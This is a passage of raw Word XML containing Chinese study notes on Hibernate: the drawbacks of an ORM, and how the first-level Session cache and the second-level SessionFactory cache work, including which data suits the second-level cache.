          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:r w:rsidR="005B5064" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="005B5064" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>事务管理都不错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456AEC" w:rsidRPr="00F41A4C" w:rsidRDefault="00456AEC" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>缺点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456AEC" w:rsidRPr="00F41A4C" w:rsidRDefault="00023556" w:rsidP="00EB2258">
      <w:pPr>
        <w:ind w:firstLineChars="150" w:firstLine="315"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="001E1A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>优化比较困难</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="00612632" w:rsidP="004F0660">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   (2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>批量处理数据有劣势</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00931CFE" w:rsidRDefault="0098478E" w:rsidP="004F0660">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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一、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>why</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>（为什么要用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>缓存？）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>是一个持久层框架，经常访问物理数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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为了降低应用程序对物理数据源访问的频次，从而提高应用程序的运行性能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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缓存内的数据是对物理数据源中的数据的复制，应用程序在运行时从缓存读写数据，在特定的时刻或事件会同步缓存和物理数据源的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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二、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>缓存原理是怎样的？）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>缓存包括两大类：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>一级缓存和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>二级缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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1.Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>一级缓存又称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的缓存</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>内置不能被卸载，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的缓存是事务范围的缓存（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>对象的生命周期通常对应一个数据库事务或者一个应用事务）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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一级缓存中，持久化类的每个实例都具有唯一的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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br/>
        <w:t>2.Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>二级缓存又称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的缓存</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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lastRenderedPageBreak/>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>对象的生命周期和应用程序的整个过程对应，因此</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>二级缓存是进程范围或者集群范围的缓存，有可能出现并发问题，因此需要采用适当的并发访问策略，该策略为被缓存的数据提供了事务隔离级别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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第二级缓存是可选的，是一个可配置的插件，默认下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>不会启用这个插件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>提供了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.hibernate.cache.CacheProvider</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>它充当缓存插件与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>之间的适配器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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 xml:space="preserve">什么样的数据适合存放到第二级缓存中？　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">很少被修改的数据　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">不是很重要的数据，允许出现偶尔并发的数据　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">不会被并发访问的数据　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">常量数据　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">不适合存放到第二级缓存的数据？　　</w:t>
      </w:r>
